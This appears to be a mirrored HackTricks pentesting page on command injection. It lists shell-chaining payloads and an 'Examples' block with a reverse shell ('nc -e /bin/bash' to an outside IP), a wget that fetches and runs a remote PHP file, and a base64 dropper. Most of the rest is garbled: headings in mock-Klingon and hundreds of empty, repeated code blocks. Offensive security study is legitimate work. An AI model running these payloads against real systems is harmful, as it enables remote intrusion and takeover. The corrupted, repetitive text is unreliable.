mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
2239 lines
20 KiB
Markdown
2239 lines
20 KiB
Markdown
# Command Injection
|
|
|
|
<details>
|
|
|
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Other ways to support HackTricks:
|
|
|
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
|
|
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
|
Get Access Today:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
## What is command Injection?
|
|
|
|
A **command injection** permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. As a result, the application and all its data can be fully compromised. The execution of these commands typically allows the attacker to gain unauthorized access or control over the application's environment and underlying system.
|
|
|
|
### Context
|
|
|
|
Depending on **where your input is being injected** you may need to **terminate the quoted context** (using `"` or `'`) before the commands.
|
|
|
|
## Command Injection/Execution
|
|
```bash
|
|
#Both Unix and Windows supported
|
|
ls||id; ls ||id; ls|| id; ls || id # Execute both
|
|
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
|
|
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
|
|
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
|
|
ls %0A id # %0A Execute both (RECOMMENDED)
|
|
|
|
#Only unix supported
|
|
`ls` # ``
|
|
$(ls) # $()
|
|
ls; id # ; Chain commands
|
|
ls${LS_COLORS:10:1}${IFS}id # Might be useful
|
|
|
|
#Not executed but may be interesting
|
|
> /var/www/html/out.txt #Try to redirect the output to a file
|
|
< /etc/passwd #Try to send some input to the command
|
|
```
|
|
### **QaD** Bypasses
|
|
|
|
If you are trying to execute **arbitrary commands inside a linux machine** you will be interested to read about this **Bypasses:**
|
|
|
|
{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %}
|
|
[bypass-bash-restrictions.md](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
|
{% endcontent-ref %}
|
|
|
|
### **ghItlh**
|
|
```
|
|
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
|
|
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
|
|
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
|
|
```
|
|
### Parameters
|
|
|
|
**Qa'Hom**
|
|
|
|
ngoD 25 parameters 'ej vItlhutlhlaH code injection 'ej similar RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)):
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
